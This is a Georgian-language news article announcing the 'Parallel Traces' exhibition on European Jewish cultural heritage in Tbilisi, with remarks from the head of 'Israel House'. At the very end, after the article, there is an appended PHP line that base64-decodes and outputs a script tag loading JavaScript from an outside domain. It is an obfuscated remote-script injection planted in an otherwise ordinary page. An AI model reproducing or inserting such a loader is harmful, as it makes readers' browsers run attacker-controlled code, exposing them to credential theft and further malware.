celsiusi
ავერსი შნაიდერი
დღეს თბილისში ებრაული კულტურისა და მემკვიდრეობის დაცვისა და ხელშეწყობის ევროპული ასოციაციის AEPJ-ის ახალი პროექტის - Parallel Traces გამოფენა გაიხსნება, რომელიც ევროკავშირთან თანამშრომლობით, Creative Europe - პროგრამის ფარგლებში შეიქმნა.
 
AEPJ არის ევროპაში ებრაული კულტურული მემკვიდრეობის მარშრუტის ოფიციალური წარმდგენი და ის სერტიფიცირებულია ევროსაბჭოს მიერ.
 
გამოფენის ორგანიზატორია „ისრაელის სახლი“, რომელიც საქართველოში ებრაული კულტურული მემკვიდრეობის მარშრუტის ოფიციალური წარმდგენია. ორგანიზაცია აქტიურად თანამშრომლობს საქართველოს განათლების, მეცნიერების, კულტურისა და სპორტის სამინისტროსა და AEPJ-სთან, რომელთა ეგიდითაც ხორციელდება აღნიშნული მარშრუტი.
 
გამოფენა Parallel Traces-ის პროექტის ავტორები მიიჩნევენ, რომ ევროპის ისტორიის განუყოფელი ნაწილის - ევროპული ებრაული მემკვიდრეობის შესახებ ცნობიერების ამაღლება სხვადასხვა მექანიზმის საშუალებით შეიძლება. კერძოდ, ლაპარაკია ფოტოგრაფიული და აუდიოვიზუალური ნამუშევრების შექმნასა და ახალი აპლიკაციის განვითარებაზე. ებრაული მემკვიდრეობის ამსახველი ორიგინალური ციფრული ნამუშევრები, აგრეთვე, მნიშვნელოვანი მხატვრული მასალებია, რომლებიც წარმოდგენილი იქნება გამოფენებზე.
ეს იქნება ტრანსნაციონალური კულტურული და შემოქმედებითი სამუშაოების შედეგი. პროექტის მონაწილე ქვეყნებია: ბელგია, ლუქსემბურგი, ესპანეთი, სერბია, რუმინეთი, პოლონეთი და საქართველო.
 
სპეციალურად ამ ღონისძიებისთვის თბილისს ეწვია ებრაული კულტურისა და მემკვიდრეობის დაცვისა და ხელშეწყობის ევროპული ასოციაციის AEPJ-ის ხელმძღვანელობა და სტუმრები ევროპის ხუთი ქვეყნიდან. ღონისძიებას დაესწრებიან, აგრეთვე, საქართველოს პარლამენტის წევრები, განათლების, მეცნიერების, კულტურისა და სპორტის სამინისტროს წარმომადგენლები. გამოფენის გახსნას პირდაპირი ჩართვით ისრაელიდან მიესალმება ქნესეთის წევრი, იმიგრაციის, აბსორბციისა და დიასპორის საქმეთა კომიტეტის თავმჯდომარე დავიდ ბიტანი. 
 
გამოფენა გაიხსნება - დღეს, 17:30 საათზე, თანამედროვე ხელოვნების მუზეუმში, მის: რუსთაველის გამზირი #27 და გაგრძელდება 11 აპრილამდე.
 
„ისრაელის სახლის“ ხელმძღვანელისა და საქართველო-ისრაელის ბიზნესპალატის თავმჯდომარის იციკ მოშეს შეფასებით, მნიშვნელოვანია კულტურულ მემკვიდრეობაზე ზრუნვა და ამ საქმეში განსაკუთრებულ როლს უნდა ასრულებდნენ საზოგადოებრივი ორგანიზაციები. „საქართველოში ჩვენი ორგანიზაციების საქმიანობის ერთ-ერთი ძირითადი მიმართულებაა კულტურულ-ისტორიულ ღირებულებათა პოპულარიზაცია, რაც გამოიხატება არა მხოლოდ ასეთი ღონისძიებების ორგანიზებაში, არამედ კულტურულ მემკვიდრეობის შენარჩუნების საქმეში უშუალო მონაწილეობაში. ეს  განსაკუთრებით აქტუალურია ისეთი დიდი ისტორიის მქონე ქვეყანასა და ქალაქში, როგორიც საქართველო და თბილისია, რომლებიც გამორჩეულია მულტიკულტურით, მათ შორის ებრაული კულტურული მემკვიდრეობის ნიმუშებით. ესაა კულტურული კოდი, რომელიც კონკრეტული კულტურის ერთგვარი გასაღებია. საქართველო-ისრაელის ბიზნესპალატამ შექმნა კონცეფცია, რომელიც ტრადიციული კულტურული ელემენტების შენარჩუნებით ასეთი ძველი უბნების განვითარებას ითვალისწინებს. ბიზნესპალატის წევრი კომპანიების მიერ ქალაქში შექმნილი ელიტარული ობიექტები, სპეციალისტთა სამართლიანი შეფასებით, ორგანულად ერწყმის ისტორიული ქალაქის ტრადიციას. ამიტომ ასეთი აქტივობებით ჩვენ ვაგრძელებთ აქტიურ მუშაობას ევროსაბჭოსთან, კულტურის სამინისტროსთან და ყველა იმ უწყებასთან, რომლებიც მუშაობენ უნიკალური კულტურული განსაკუთრებულობის შენახვა/განვითარებაზე“, - აცხადებს იციკ მოშე. 
 
იციკ მოშე არის ისრაელის პრეისტორიის მუზეუმის მეგობართა ჯგუფის ხელმძღვანელი და აქტიურად მუშაობს კულტურული მემკვიდრეობის დაცვის საკითხებზე.
 
 
 
1328
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");